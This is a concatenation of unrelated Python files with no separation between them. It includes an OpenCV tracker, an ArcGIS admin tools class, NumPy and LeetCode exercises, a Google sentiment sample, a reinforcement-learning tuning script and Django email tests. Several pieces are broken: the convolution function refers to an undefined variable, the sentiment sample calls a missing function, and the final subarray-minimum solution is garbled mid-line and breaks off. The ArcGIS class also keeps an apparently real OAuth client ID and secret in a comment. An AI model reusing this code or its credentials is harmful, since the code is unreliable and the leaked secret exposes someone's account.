graph if dx < 0 and dy >=0: return 180 + degree elif dx <0 and dy <= 0: return 180 - degree elif dx > 0 and dy <= 0: return degree else: return 360 - degree def futureFramePosition(self, ): if self.tracker_type == TrackerType.MOSSE: if len(self.tracker.dx) <5 or len(self.tracker.dx) > 20 : self.estimationFutureCenter.append(self.tracker.center) return -1,-1,-1,-1 measure = min(len(self.tracker.dx),10) expectedPositionNo = len(self.tracker.dx)+10 x,y = self.tracker.center dx = sum(self.tracker.dx[-measure:]) / len(self.tracker.dx[-measure:]) dy = sum(self.tracker.dy[-measure:]) / len(self.tracker.dy[-measure:]) x_new = x + dx*measure y_new = y + dy*measure self.estimationFutureCenter[expectedPositionNo] = (x_new,y_new) return self.tracker.getCutFramePosition((x_new,y_new)) else: if len(self.dx) <5 or len(self.dx) > 20 : self.estimationFutureCenter.append(self.get_position(self.history[-1])) return -1,-1,-1,-1 measure = min(len(self.dx),10) expectedPositionNo = len(self.dx)+10 x,y = self.get_position(self.history[-1]) dx = sum(self.dx[-measure:]) / len(self.dx[-measure:]) dy = sum(self.dy[-measure:]) / len(self.dy[-measure:]) x_new = x + dx*measure y_new = y + dy*measure self.estimationFutureCenter[expectedPositionNo] = (x_new,y_new) return self.getCutFramePosition((x_new,y_new)) #get frames of box to enter it to vif descriptor or save it def getFramesOfTracking(self,frames,last_no_of_frames = 30): if len(self.history) < last_no_of_frames: return None,-1,-1,-1,-1,-1,-1 xmin, ymin, xmax, ymax = self.getTrackedFramesBoxed(last_no_of_frames) width, height = xmax - xmin, ymax - ymin new_frames = [] size = len(frames) for i in range(size - last_no_of_frames, size, 1): new_frames.append(frames[i][ymin:ymax, xmin:xmax]) return new_frames,width,height,xmin,xmax,ymin,ymax def isAboveSpeedLimit(self,from_frame_no = -1,to_frame_no = -1): if self.avg_speed[to_frame_no] == None: self.avg_speed[to_frame_no] = self.getAvgSpeed(from_frame_no,to_frame_no) if self.avg_speed[to_frame_no] > 50: return True return False class TrackerManager: def __init__(self, srcVid, paused = False , test = True): self.cap = cv2.VideoCapture(srcVid) self.frame_width = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)) self.frame_height = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) ret, self.frame = self.cap.read() if not ret: print("ERROR: not return any feed from this src vid"+srcVid) return cv2.imshow('frame', self.frame) self.rect_sel = RectSelector('frame', self.select) self.trackers = [] self.paused = paused self.frames=[] def select(self, rect): global id frame_gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY) tracker = Tracker(frame_gray,rect,self.frame_width,self.frame_height,id,TrackerType.DLIB) id+=1 # tracker = MOSSE(frame_gray, rect) self.trackers.append(tracker) def saveTrackers(self,trackers): for tracker in self.trackers: tracker.saveTracking(frames) def run(self): f = 1 cum = 0 global frames while True: if not self.paused: ret, self.frame = self.cap.read() if not ret: break dim = (480, 360) self.frame = cv2.resize(self.frame, dim, interpolation=cv2.INTER_AREA) frames.append(self.frame.copy()) frame_gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY) t = time() for tracker in self.trackers: f+=1 tracker.update(frame_gray) # tracker.updateTracking(frame_gray) cum += time() -t # print(time() - t ) vis = self.frame.copy() for tracker in self.trackers: tracker.showFrame(vis) self.rect_sel.draw(vis) cv2.imshow('frame', vis) ch = cv2.waitKey(10) if ch == 27: break if ch == ord(' '): self.paused = not self.paused if ch == ord('c'): self.trackers = [] if f%30 == 0: thread = Thread(target=self.saveTrackers(self.trackers)) thread.start() print(f/cum) if __name__ == '__main__': # opts, args = getopt.getopt(sys.argv[1:], '', ['pause']) # opts = dict(opts) # src = args[0] tracker_manager =TrackerManager(str(Path(__file__).parent.parent)+"\\videos\\1528.mp4", paused =True) tracker_manager.run() dateTimeFormat = '%Y-%m-%d %H:%M' import arcrest from arcrest.agol import FeatureLayer from arcrest.agol import FeatureService from arcrest.hostedservice import AdminFeatureService import datetime, time import json import os from .. import common import gc ######################################################################## class baseToolsClass(object): _org_url = None _username = None _password = None _proxy_url = None _proxy_port = None _token_url = None _securityHandler = None _featureServiceFieldCase = None #---------------------------------------------------------------------- def __init__(self, username=None, password=, org_url=None, token_url = None, proxy_url=None, proxy_port=None, use_arcgis_creds=None): """Constructor""" self._proxy_url = proxy_url self._proxy_port = proxy_port if use_arcgis_creds == True: self._securityHandler = arcrest.ArcGISTokenSecurityHandler(proxy_url=self._proxy_url, proxy_port=self._proxy_port) token = self._securityHandler.token self._org_url = self._securityHandler.org_url self._username = self._securityHandler.username self._valid = True else: self._token_url = token_url self._org_url = org_url self._username = username self._password = password if self._org_url is None or self._org_url =='': self._org_url = 'http://www.arcgis.com' if self._username == "" or self._password == "": self._message = "No username or password, no security handler generated" self._valid = True else: if self._org_url is None or '.arcgis.com' in self._org_url: self._securityHandler = arcrest.AGOLTokenSecurityHandler(username=self._username, password=, org_url=self._org_url, token_url=self._token_url, proxy_url=self._proxy_url, proxy_port=self._proxy_port) token = self._securityHandler.token #if self._securityHandler.message['error']['code'] == 400: #self._securityHandler = arcrest.OAuthSecurityHandler(client_id='', #secret_id='', #org_url=self._org_url, #proxy_url=self._proxy_url, #proxy_port=self._proxy_port) #token = self._securityHandler.token else: self._securityHandler = arcrest.PortalTokenSecurityHandler(username=self._username, password=self._password, org_url=self._org_url, proxy_url=self._proxy_url, proxy_port=self._proxy_port) token = self._securityHandler.token admin = arcrest.manageorg.Administration(url=self._org_url, securityHandler=self._securityHandler) hostingServers = admin.hostingServers() for hostingServer in hostingServers: serData = hostingServer.data serData dataItems = serData.rootDataItems if 'rootItems' in dataItems: for rootItem in dataItems['rootItems']: if rootItem == '/enterpriseDatabases': rootItems = serData.findDataItems(ancestorPath=rootItem,type='fgdb,egdb') if not rootItems is None and 'items' in rootItems: for item in rootItems['items']: if 'info' in item: if 'isManaged' in item['info'] and item['info']['isManaged'] == True: conStrDic = {} conStr = item['info']['connectionString'].split(";") for conStrValue in conStr: spltval = conStrValue.split("=") conStrDic[spltval[0]] = spltval[1] if 'DBCLIENT' in conStrDic: if str(conStrDic['DBCLIENT']).upper() == 'postgresql'.upper(): self._featureServiceFieldCase = 'lower' #if 'error' in self._securityHandler.message and token is None: #if self._securityHandler.message['error']== 401: #self._securityHandler = arcrest.OAuthSecurityHandler(client_id='s5CKlHcJoNSm07TP', #secret_id='6015feb0f44c4a5fa00e1e9486de8c48', #org_url=self._org_url, #proxy_url=self._proxy_url, #proxy_port=self._proxy_port) #token = self._securityHandler.token if 'error' in self._securityHandler.message and token is None: self._message = self._securityHandler.message self._valid = False else: self._message = self._securityHandler.message self._valid = True #---------------------------------------------------------------------- def dispose(self): self._username = None self._password = None self._org_url = None self._proxy_url = None self._proxy_port = None self._token_url = None self._securityHandler = None self._valid = None self._message = None del self._username del self._password del self._org_url del self._proxy_url del self._proxy_port del self._token_url del self._securityHandler del self._valid del self._message #---------------------------------------------------------------------- @property def message(self): """ returns any messages """ return self._message #---------------------------------------------------------------------- @message.setter def message(self,message): """ returns any messages """ self._message = message #---------------------------------------------------------------------- @property def valid(self): """ returns boolean wether handler is valid """ return self._valid #---------------------------------------------------------------------- @valid.setter def valid(self,valid): """ returns boolean wether handler is valid """ self._valid = valid # __author__ = chnegpeng # __email__ = # __date__ = 2020.11.10 # __desc__ = calculate the sum of each figure of a number a=0 """ 1.题目:给定一个三位数,求每位上的数字之和 2.思考需要哪些变量,先定义变量 """ sum = 0 number = 123 weight = 100 figure = 0 """ 1.因为不需要遍历一个区间的所有数,所以不用for循环 2.选择 while 循环 3.继续思考谁在while循环中充当变量? 4.陈导给的选择是 weight """ while weight >= 1: """ 1.因为是各位数上的数字求和,所以要找出对应的数字 2.利用整除法 可以得到百位,十位,个位数字 3.利用取余法可以得到剩下的两位数 """ figure = number // weight number = number % weight """ 1。到达上面一步后,思维就卡壳了,我还在想改如何对十位上的数字取整 2.按照思维惯性,还会继续写 figure = number // weight来求十位,可能会再定义weight等 3.上面的思路其实忘掉了while作为循环语句的本质了,因为下面的代码只要符合条件就会一直循环执行 4.再看一下循环条件 weight >= 1.开头已经定义了weight= 100.现在需要重新定义或重新赋值 """ weight = weight // 10 """ 1.一定要熟悉 sum = sum + a 的结构,相当于重新赋值、定义 2.也就是陈导强调的:在需要的时候就去定义变量 3.最后一行代码 和 while 形成一个闭环,首尾呼应了 """ sum = sum + figure print("figure",figure) """ 1.还要注意代码缩进,sum写在不同的位置结果就不同,刚刚又弄错了 """ print("sum",sum) gustavopmachado/MITx6.86x import numpy as np def randomization(n): """ Arg: n - an integer Returns: A - a randomly-generated nx1 Numpy array. """ A = np.random.random_sample([n, 1]) return A def operations(h, w): """ Takes two inputs, h and w, and makes two Numpy arrays A and B of size h x w, and returns A, B, and s, the sum of A and B. Arg: h - an integer describing the height of A and B w - an integer describing the width of A and B Returns (in this order): A - a randomly-generated h x w Numpy array. B - a randomly-generated h x w Numpy array. s - the sum of A and B. """ A = np.random.random_sample([h, w]) B = np.random.random_sample([h, w]) s = A + B return A, B, s def norm(A, B): """ Takes two Numpy column arrays, A and B, and returns the L2 norm of their sum. Arg: A - a Numpy array B - a Numpy array Returns: s - the L2 norm of A+B. """ s = np.linalg.norm(A+B) return s def neural_network(inputs, weights): """ Takes an input vector and runs it through a 1-layer neural network with a given weight matrix and returns the output. Arg: inputs - 2 x 1 NumPy array weights - 2 x 1 NumPy array Returns (in this order): out - a 1 x 1 NumPy array, representing the output of the neural network """ # Dot product between the inputs and weights vectors r = np.sum(np.dot(np.transpose(weights), inputs)) # Apply a non-linear function to the result z = np.array([np.tanh(np.array([r]))]) return z def scalar_function(x, y): """ Returns the f(x,y) defined in the problem statement. """ if x <= y: return x * y return x / y def vector_function(x, y): """ Make sure vector_function can deal with vector input x,y. """ # Vectorize the scalar function f = np.vectorize(scalar_function) return f(x, y) def main(): x = np.random.random_sample([2, 1]) y = np.random.random_sample([2, 1]) z = vector_function(x, y) print(z) if __name__ == "__main__": main() 0 #!/usr/bin/env python # Copyright 2019 Google, LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # To install the latest published package dependency, execute the following: # pip install google-cloud-language # [START language_sentiment_text] from google.cloud import language from google.cloud.language import enums from google.cloud.language import types def analyze_sentiment_text(text_content='I am so happy and joyful'): """Analyze sentiment of text Args: text: Text to analyze, e.g. 'Hello, world!' """ client = language.LanguageServiceClient() document = types.Document( content=text_content, type=enums.Document.Type.PLAIN_TEXT) response = client.analyze_sentiment(document) sentiment = response.document_sentiment print('Score: {}'.format(sentiment.score)) print('Magnitude: {}'.format(sentiment.magnitude)) # [END language_sentiment_text] def main(): import argparse parser = argparse.ArgumentParser() parser.add_argument( '--text_content', type=str, default='Hello, world!') args = parser.parse_args() analyze_sentiment(args.text_content) if __name__ == '__main__': main() from fontParts.base.anchor import BaseAnchor from babelfont import addUnderscoreProperty @addUnderscoreProperty("name") @addUnderscoreProperty("glyph") @addUnderscoreProperty("color") @addUnderscoreProperty("x") @addUnderscoreProperty("y") class Anchor(BaseAnchor): pass import json import time import numpy as np import argparse from pathlib import Path from itertools import product from pprint import PrettyPrinter from grl.generalized_experiment import GeneralizedExperiment from grl.agents import DQNAgent # from grl.agents import SarsaTCAgent from grl.envs.mountaincar import MountainCarEnv from definitions import ROOT_DIR def get_lr(b=1e-2, a=2, n=5): return list(b/a**np.array(list(range(0, n)))) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--no-target", help="Don't use target networks", action="store_true") parser.add_argument("--no-replay", help="Don't use experience replay", action="store_true") args = parser.parse_args() pp = PrettyPrinter(indent=4) # So here we need to run multiple runs over multiple hyperparams. # step_sizes = [1.0, 0.75, 0.5, 0.25, 0.125, 0.06125] # # tilings = [8, 16, 32] # # tiles = [8, 16, 32] max_replay_sizes = [10000] update_target_intervals = [10000] step_sizes = get_lr()[-3:-2] # THIS IS JUST A TEST # We set num_actions in experiment.py run_hps = { 'log_every': 1000, 'max_eps_steps': float('inf'), 'max_total_steps': 150000 } all_avg_results = [] exp_dir = Path(ROOT_DIR, 'experiments') timestr = time.strftime("%Y%m%d-%H%M%S") print(f"Start experiment for DQN at {timestr}") env_hps_fname = exp_dir / 'tuning_params.json' with open(env_hps_fname, 'r') as f: env_hpses = json.load(f) # run across all hyperparams current_max = None current_max_rew = -float('inf') for step_size, replay_size, update_target in product(step_sizes, max_replay_sizes, update_target_intervals): agent_hps = { 'batch_size': 32, 'epsilon': 0.01, 'step_size': step_size, 'discount': 0.99, 'max_replay_size': replay_size, 'update_target_interval': update_target, 'use_replay': not args.no_replay, 'use_target': not args.no_target } print("Experiment on DQN on hyperparams") pp.pprint(agent_hps) exp = GeneralizedExperiment(DQNAgent, MountainCarEnv, agent_hps=agent_hps, env_hpses=env_hpses, run_hps=run_hps, seeds=[2020]) exp.run() # here we append the average per-episode reward across all 25 tuning # environments. avg_rew = np.average(exp.all_avg_ep_rews) all_avg_results.append((agent_hps, avg_rew)) if avg_rew > current_max_rew: current_max = agent_hps current_max_rew = avg_rew print(f"Done tuning, best performant agent for DQN is") pp.pprint(current_max) # Here we need to pick which ones are best print("Begin testing") # Test here test_env_hps_fname = Path(ROOT_DIR, 'experiments', 'testing_params.json') with open(test_env_hps_fname, 'r') as f: test_env_hpses = json.load(f) test_exp = GeneralizedExperiment(DQNAgent, MountainCarEnv, agent_hps=current_max, env_hpses=test_env_hpses, run_hps=run_hps, seeds=[2020]) test_exp.run() results = { 'best_hparams': current_max, 'avg_ep_rewards': test_exp.all_avg_ep_rews, 'all_tune_results': all_avg_results } fname = "dqn" if args.no_target: fname += "_no_target" if args.no_replay: fname += "_no_replay" res_fname = exp_dir / 'dqn' / f'{fname}_results_{timestr}.json' print(f"Testing finished. Saving results to {res_fname}") with open(res_fname, 'w') as f: json.dump(results, f) 0 import numpy as np def convolucion(Ioriginal,Kernel): fr = len(Ioriginal) - (len(Kernel) - 1) cr = len(Ioriginal[0]) - (len(kernel[0])- 1) Resultado = np.zeros((fr,cr)) #for para recorrer filas for i in range(len(Resultado)): #for para recorrer columnas for j in range(len(Resultado[0])): #Hace las multiplicaciones y la suma suma = 0 #for para cada elemento del kernel de las filas del kernel for m in range(len(Kernel)): #for para cada elemento del kernel de las columnas for n in range(len(kernel[0])): suma += Kernel[m][n] * Ioriginal[m+i][n+j] Resultado[i][j] = suma return Resultado #imagenes K=[[-1,0,1],[-1,0,1],[-1,0,1]] I=[[2,0,1,1,1],[3,0,0,0,2],[1,1,1,1,1],[3,1,1,1,2],[1,1,1,1,1]] #imagenes a numpy arrays In = np.array(I) Kn = np.array(K) #Funcion de convolucion R = convolucion(In,Kn) print(R) """ eZmax API Definition (Full) This API expose all the functionnalities for the eZmax and eZsign applications. # noqa: E501 The version of the OpenAPI document: 1.1.7 Contact: Generated by: https://openapi-generator.tech """ import sys import unittest import eZmaxApi from eZmaxApi.model.common_response import CommonResponse from eZmaxApi.model.common_response_obj_debug import CommonResponseObjDebug from eZmaxApi.model.common_response_obj_debug_payload import CommonResponseObjDebugPayload from eZmaxApi.model.ezsigndocument_edit_ezsignsignatures_v1_response_all_of import EzsigndocumentEditEzsignsignaturesV1ResponseAllOf from eZmaxApi.model.ezsigndocument_edit_ezsignsignatures_v1_response_m_payload import EzsigndocumentEditEzsignsignaturesV1ResponseMPayload globals()['CommonResponse'] = CommonResponse globals()['CommonResponseObjDebug'] = CommonResponseObjDebug globals()['CommonResponseObjDebugPayload'] = CommonResponseObjDebugPayload globals()['EzsigndocumentEditEzsignsignaturesV1ResponseAllOf'] = EzsigndocumentEditEzsignsignaturesV1ResponseAllOf globals()['EzsigndocumentEditEzsignsignaturesV1ResponseMPayload'] = EzsigndocumentEditEzsignsignaturesV1ResponseMPayload from eZmaxApi.model.ezsigndocument_edit_ezsignsignatures_v1_response import EzsigndocumentEditEzsignsignaturesV1Response class TestEzsigndocumentEditEzsignsignaturesV1Response(unittest.TestCase): """EzsigndocumentEditEzsignsignaturesV1Response unit test stubs""" def setUp(self): pass def tearDown(self): pass def testEzsigndocumentEditEzsignsignaturesV1Response(self): """Test EzsigndocumentEditEzsignsignaturesV1Response""" # FIXME: construct object with mandatory attributes with example values # model = EzsigndocumentEditEzsignsignaturesV1Response() # noqa: E501 pass if __name__ == '__main__': unittest.main() 0 import dash import dash_html_components as html from app_template import GenerateApp app = dash.Dash(__name__) app.layout = html.Div(children=GenerateApp(app=app).html) if __name__ == '__main__': app.run_server(host='0.0.0.0', port=8000, debug=True)from math import pi from physical_constants import * n = 3.62 me = 0.067 * m0 mh = 0.47 * m0 Ep = 25.7 * q M = (m0 / 6) * Ep Eg = 1.424 * q #Na = 2.0e18 * 1e6 Nd = 0.0 Na = 0.0 #Na = 0.0 #Nd = 2.0e17 *1e6 ni = 2.1e6 * 1e6 Nc = 4.37e17 * 1e6 Nv = 8.68e18 * 1e6 from docx import Document import re doc = Document(r"D:/PTU/Gardenia/2022/SplitandMerge/tools/sea/democ.docx") pp = '父亲' for p in doc.paragraphs: matchRet = re.findall(pp,p.text) for r in matchRet: p.text = p.text.replace(r,'MOMO') doc.add_heading('一级标题') doc.save(r'D:/PTU/Gardenia/2022/SplitandMerge/tools/sea/democc.docx') datawinners/entity/tests/test_views_unit_test.py from collections import OrderedDict from unittest.case import TestCase from django.conf import settings from django.contrib.auth.models import User from django.contrib.sites.models import get_current_site from django.http import HttpRequest from django.template.loader import render_to_string from django.utils.http import int_to_base36 from mock import Mock, patch, PropertyMock from django.core import mail from datawinners.entity.view.unique_id import _subject_short_codes_to_delete from datawinners.entity.views import initialize_values from datawinners.entity.views import _format_imported_subjects_datetime_field_to_str from mangrove.datastore.database import DatabaseManager from mangrove.datastore.entity import Entity from datawinners.accountmanagement.models import Organization, NGOUserProfile from datawinners.entity.views import create_single_web_user from datawinners.entity.import_data import send_email_to_data_sender from datawinners.search.entity_search import SubjectQuery from datawinners.tests.email_utils import set_email_settings from mangrove.form_model.field import TextField, DateField from mangrove.form_model.form_model import FormModel import datetime WEB_USER_TEST_EMAIL = "create_" class TestView(TestCase): def setUp(self): set_email_settings() def test_create_single_web_user(self): org = Mock(spec=Organization) org.org_id = "org_id" org.account_type = "Basic" site = get_current_site(None) mock_entity = Mock(spec=Entity) mock_entity.value.return_value = 'test' users = User.objects.filter(email=WEB_USER_TEST_EMAIL) NGOUserProfile.objects.filter(org_id=org.org_id).delete() users.delete() with patch("django.contrib.auth.tokens.default_token_generator.make_token") as make_token: make_token.return_value = "token" with patch("datawinners.entity.views.get_database_manager_for_org") as get_dbm: get_dbm.return_value = Mock(spec=DatabaseManager) with patch("datawinners.accountmanagement.models.Organization.objects.get") as get_organization_mock: get_organization_mock.return_value = org with patch("datawinners.entity.views.get_by_short_code") as reporter_entity: with patch("datawinners.entity.views.put_email_information_to_entity") as put_email_information_to_entity: put_email_information_to_entity.return_value = None reporter_entity.return_value = mock_entity create_single_web_user(org.org_id, WEB_USER_TEST_EMAIL, "test", "en") user = User.objects.filter(email=WEB_USER_TEST_EMAIL)[0] emails = [mail.outbox.pop() for i in range(len(mail.outbox))] self.assertEqual(1, len(emails)) sent_email = emails[0] self.assertEqual(settings.EMAIL_HOST_USER, sent_email.from_email) self.assertEqual([WEB_USER_TEST_EMAIL], sent_email.to) ctx_dict = { 'domain': "localhost:8000", 'uid': int_to_base36(user.id), 'user': user, 'token': "token", 'protocol': 'http', 'account_type': org.account_type, 'site': site, } self.assertEqual(render_to_string( 'activatedatasenderemail/activation_email_subject_for_data_sender_account_en.txt'), sent_email.subject) self.assertEqual( render_to_string('activatedatasenderemail/activation_email_for_data_sender_account_en.html', ctx_dict), sent_email.body) def test_should_send_correct_activation_email_in_html_format_in_english(self): site = get_current_site(None) user = Mock(spec=User) user.email = '' user.id = 1 user.first_name = "test" language_code = "en" with patch("django.contrib.auth.tokens.default_token_generator.make_token") as make_token: make_token.return_value = "token" send_email_to_data_sender(user, language_code) emails = [mail.outbox.pop() for i in range(len(mail.outbox))] self.assertEqual(1, len(emails)) sent_email = emails[0] self.assertEqual("html", sent_email.content_subtype) self.assertEqual(settings.EMAIL_HOST_USER, sent_email.from_email) self.assertEqual([''], sent_email.to) self.assertEqual([settings.HNI_SUPPORT_EMAIL_ID], sent_email.bcc) ctx_dict = { 'domain': site.domain, 'uid': int_to_base36(user.id), 'user': user, 'token': "token", 'protocol': 'http', 'site': site, } self.assertEqual( render_to_string('activatedatasenderemail/activation_email_subject_for_data_sender_account_en.txt'), sent_email.subject) self.assertEqual( render_to_string('activatedatasenderemail/activation_email_for_data_sender_account_en.html', ctx_dict), sent_email.body) def test_should_send_correct_activaton_email_in_html_format_in_french(self): site = get_current_site(None) user = Mock(spec=User) user.email = '' user.id = 1 user.first_name = "test" language_code = "fr" with patch("django.contrib.auth.tokens.default_token_generator.make_token") as make_token: make_token.return_value = "token" send_email_to_data_sender(user, language_code) emails = [mail.outbox.pop() for i in range(len(mail.outbox))] self.assertEqual(1, len(emails)) sent_email = emails[0] self.assertEqual("html", sent_email.content_subtype) self.assertEqual(settings.EMAIL_HOST_USER, sent_email.from_email) self.assertEqual([''], sent_email.to) self.assertEqual([settings.HNI_SUPPORT_EMAIL_ID], sent_email.bcc) ctx_dict = { 'domain': site.domain, 'uid': int_to_base36(user.id), 'user': user, 'token': "token", 'protocol': 'http', 'site':site, } self.assertEqual( render_to_string('activatedatasenderemail/activation_email_subject_for_data_sender_account_fr.txt'), sent_email.subject) self.assertEqual( render_to_string('activatedatasenderemail/activation_email_for_data_sender_account_fr.html', ctx_dict), sent_email.body) def test_should_send_correct_email_in_html_format_in_french_to_a_newly_created_user(self): site = get_current_site(None) user = Mock(spec=User) user.email = '' user.id = 1 user.first_name = "test" language_code = "fr" request = Mock() request.user.first_name = "rakoto" with patch("django.contrib.auth.tokens.default_token_generator.make_token") as make_token: make_token.return_value = "token" send_email_to_data_sender(user, language_code, type="created_user", request=request) emails = [mail.outbox.pop() for i in range(len(mail.outbox))] self.assertEqual(1, len(emails)) sent_email = emails[0] self.assertEqual("html", sent_email.content_subtype) self.assertEqual(settings.EMAIL_HOST_USER, sent_email.from_email) self.assertEqual([''], sent_email.to) self.assertEqual([settings.HNI_SUPPORT_EMAIL_ID], sent_email.bcc) ctx_dict = { 'domain': site.domain, 'uid': int_to_base36(user.id), 'user': user, 'token': "token", 'protocol': 'http', 'creator_user': request.user.first_name, 'site': site, 'account_type': 'Pro SMS', } self.assertEqual(render_to_string('registration/created_user_email_subject_fr.txt') % site.domain, sent_email.subject) self.assertEqual(render_to_string('registration/created_user_email_fr.html', ctx_dict), sent_email.body) def test_should_send_correct_email_in_html_format_in_english_to_a_newly_created_user(self): site = get_current_site(None) user = Mock(spec=User) user.email = '' user.id = 1 user.first_name = "test" language_code = "en" request = Mock() request.user.first_name = "rakoto" with patch("django.contrib.auth.tokens.default_token_generator.make_token") as make_token: make_token.return_value = "token" send_email_to_data_sender(user, language_code, type="created_user", request=request) emails = [mail.outbox.pop() for i in range(len(mail.outbox))] self.assertEqual(1, len(emails)) sent_email = emails[0] self.assertEqual("html", sent_email.content_subtype) self.assertEqual(settings.EMAIL_HOST_USER, sent_email.from_email) self.assertEqual([''], sent_email.to) self.assertEqual([settings.HNI_SUPPORT_EMAIL_ID], sent_email.bcc) ctx_dict = { 'domain': site.domain, 'uid': int_to_base36(user.id), 'user': user, 'token': "token", 'protocol': 'http', 'creator_user': request.user.first_name, 'site': site, 'account_type': 'Pro SMS', } self.assertEqual(render_to_string('registration/created_user_email_subject_en.txt') % site.domain, sent_email.subject) self.assertEqual(render_to_string('registration/created_user_email_en.html', ctx_dict), sent_email.body) def test_should_set_field_initial_value_as_none_if_not_populated(self): empty_field = TextField(name="text", code="code", label="what is ur name" ) empty_field.value = None form_model = FormModel(Mock(spec=DatabaseManager)) form_model.add_field(empty_field) mock_subject = Mock(spec=Entity) type(mock_subject).data = PropertyMock(return_value={}) initialize_values(form_model, mock_subject) self.assertEquals(None, empty_field.value) def test_should_convert_field_value_to_unicode_when_field_value_present(self): empty_field = TextField(name="text", code="code", label="what is ur name" ) empty_field.value = "FirstName" form_model = FormModel(Mock(spec=DatabaseManager)) form_model.add_field(empty_field) mock_subject = Mock(spec=Entity) type(mock_subject).data = PropertyMock(return_value={"text": {"value": "SomeValue"}}) initialize_values(form_model, mock_subject) self.assertIsInstance(empty_field.value, unicode) self.assertEquals(u"SomeValue", empty_field.value) def test_select_short_codes_sent_from_web_when_all_ids_not_selected(self): request = HttpRequest() request.POST = {"all_ids": "1;2;3"} self.assertEquals(_subject_short_codes_to_delete(request, Mock(DatabaseManager), "test_type"), ['1', '2', '3']) def test_select_short_codes_using_search_query_when_all_selected_on_web(self): request = HttpRequest() request.user = 'test' request.POST = {"all_ids": "1;2;3", "all_selected": "true", "search_query": "something"} with patch("datawinners.entity.view.unique_id.SubjectQuery") as mock_subject_query_class: with patch("datawinners.entity.view.unique_id.get_form_model_by_entity_type") as get_form_model_by_entity_type: with patch("datawinners.entity.view.unique_id.header_fields") as header_fields: instance = Mock(spec=SubjectQuery) mock_subject_query_class.return_value = instance mock_form_model = Mock(FormModel) get_form_model_by_entity_type.return_value = mock_form_model instance.query.return_value = [['s', 'x'], ['s', 'y']] header = OrderedDict() header.update({"name":"name"}) header.update({"short_code":"unique id"}) header_fields.return_value = header self.assertEquals(_subject_short_codes_to_delete(request, mock_form_model, "test_type"), ['x', 'y']) instance.query.assert_called_once_with('test', 'test_type', 'something') header_fields.assert_called_once_with(mock_form_model) def test_should_convert_datetime_to_string_after_subject_import(self): form_model = Mock(spec=FormModel) date_field = DateField('name', 'code', 'Date of birth', '') form_model.fields = [Mock(spec=TextField), date_field] subjects_data = {u'fac8': OrderedDict([('q2', u'Safidy'), ('q7', datetime.datetime(2010, 10, 10, 0, 0)), ('q6', u'fac8')]), u'fac9': OrderedDict([('q2', u'Emission'), ('q7', datetime.datetime(1947, 6, 26, 0, 0)), ('q6', u'fac9')]), u'fac7': OrderedDict([('q2', u'Patrick'), ('q7', datetime.datetime(2002, 3, 25, 0, 0)), ('q6', u'fac7')])} formated_data = _format_imported_subjects_datetime_field_to_str(form_model, subjects_data) expected_data = [[u'Safidy', '10-10-2010', u'fac8'], [u'Emission', '26-6-1947', u'fac9'], [u'Patrick', '25-3-2002', u'fac7']] self.assertEqual(expected_data, formated_data) amsifontes/hw3-my-site def ingest_base(base_file_path): base_file = open(base_file_path).read() return base_file def content_insert(template, content, insert_marker="{{ content }}"): output = template.replace(insert_marker, content) return output def main(): pages = [ { 'input': 'content/index.html', 'output': 'docs/index.html', 'title': 'Homepage', }, { 'input': 'content/bio.html', 'output': 'docs/bio.html', 'title': 'Bio', }, { 'input': 'content/blog.html', 'output': 'docs/blog.html', 'title': 'Blog', }, { 'input': 'content/projects.html', 'output': 'docs/projects.html', 'title': 'Projects', }, ] print("website fragments... assemble!!!") # ingest base template template = ingest_base('templates/base.html') # ingest dictionary for each page and assemble using metadata, # inserting/replacing title and content for page in pages: content = open(page['input']).read() full_page = content_insert(template, content) titled_full_page = content_insert(full_page, page['title'], insert_marker="{{ title }}") open(page['output'], 'w+').write(titled_full_page) print("fragments assembled successfully! :)") if __name__ == '__main__': main() # coding=utf-8 # Author: # Question: 49. Group Anagrams # Date: 16/02/2017 01:04-01:11 class Solution(object): def groupAnagrams(self, strs): """ :type strs: List[str] :rtype: List[List[str]] """ dic = {} for i in strs: root = ''.join(sorted(list(i))) if root in dic: dic[root].append(i) else: dic[root] = [i] return dic.values() s = Solution() print s.groupAnagrams(["eat", "tea", "tan", "ate", "nat", "bat"]) # has_key已经在py3中弃用了,pythonic的方式是in # 如果是read,可以用get(key,default)或get(key) or default # root可以不用字符串而用tuple,tuple可以作为字典的key # sort可以用字典排序,复杂度On """ 907. Sum of Subarray Minimums Medium Given an array of integers arr, find the sum of min(b), where b ranges over every (contiguous) subarray of arr. Since the answer may be large, return the answer modulo 109 + 7. Example 1: Input: arr = [3,1,2,4] Output: 17 Explanation: Subarrays are [3], [1], [2], [4], [3,1], [1,2], [2,4], [3,1,2], [1,2,4], [3,1,2,4]. Minimums are 3, 1, 2, 4, 1, 1, 2, 1, 1, 1. Sum is 17. Example 2: Input: arr = [11,81,94,43,3] Output: 444 Constraints: 1 <= arr.length <= 3 * 104 1 <= arr[i] <= 3 * 104 """ # V0 # IDEA : increasing stacks class Solution: def sumSubarrayMins(self, A): n, mod = len(A), 10**9 + 7 left, right, s1, s2 = [0] * n, [0] * n, [], [] for i in range(n): count = 1 while s1 and s1[-1][0] > A[i]: count += s1.pop()[1] left[i] = count s1.append([A[i], count]) for i in range(n)[::-1]: count = 1 while s2 and s2[-1][0] >= A[i]: count += s2.pop()[1] right[i] = count s2.append([A[i], count]) return sum(a * l * r for a, l, r in zip(A, left, right)) % mod # V0' # IDEA : BRUTE FORCE (TLE) # brute force # class Solution(object): # def sumSubarrayMins(self, arr): # # edge case # if not arr: # return 0 # # double loop # res = [] # for i in range(len(arr)): # for j in range(i+1, len(arr)+1): # res.append(min(arr[i:j])) # return sum(res) # V1 # IDEA : increasing stacks # https://leetcode.com/problems/sum-of-subarray-minimums/discuss/284184/Python-Max-Histogram class Solution: def sumSubarrayMins(self, A): A.append(-1) stack=[-1] res=0 for i in range(len(A)): while A[i] A[i]: count += s1.pop()[1] left[i] = count s1.append([A[i], count]) for i in range(n)[::-1]: count = 1 while s2 and s2[-1][0] >= A[i]: count += s2.pop()[1] right[i] = count s2.append([A[i], count]) 